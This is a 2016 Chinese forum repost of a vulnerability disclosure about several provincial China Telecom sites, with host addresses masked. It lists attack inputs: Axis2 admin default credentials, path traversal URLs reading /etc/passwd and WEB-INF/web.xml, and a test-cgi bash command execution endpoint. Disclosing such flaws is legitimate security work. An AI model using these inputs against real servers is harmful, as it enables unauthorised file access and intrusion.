HanDs
管理员

[7月漏洞公开] 中国电信某省多个分站漏洞打包(getshell/任意文件读取/bash命令执行) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

中国电信某省多个分站漏洞打包(getshell/任意文件读取/bash命令执行)

详细说明:

**.**.**.**:3042/axis2/axis2-admin/login admin axis2



http://**.**.**.**:8089/../../../../../../../../etc/passwd



http://**.**.**.**/%c0%ae/WEB-INF/web.xml



**.**.**.**:9999/cgi-bin/test-cgi bash命令执行

漏洞证明:

屏幕快照 2016-05-30 下午3.41.56.png



屏幕快照 2016-05-30 下午3.47.08.png



屏幕快照 2016-05-30 下午5.04.29.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国 电信 某省 多个 分站 漏洞 打包 g et sh el l/
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组
快速回复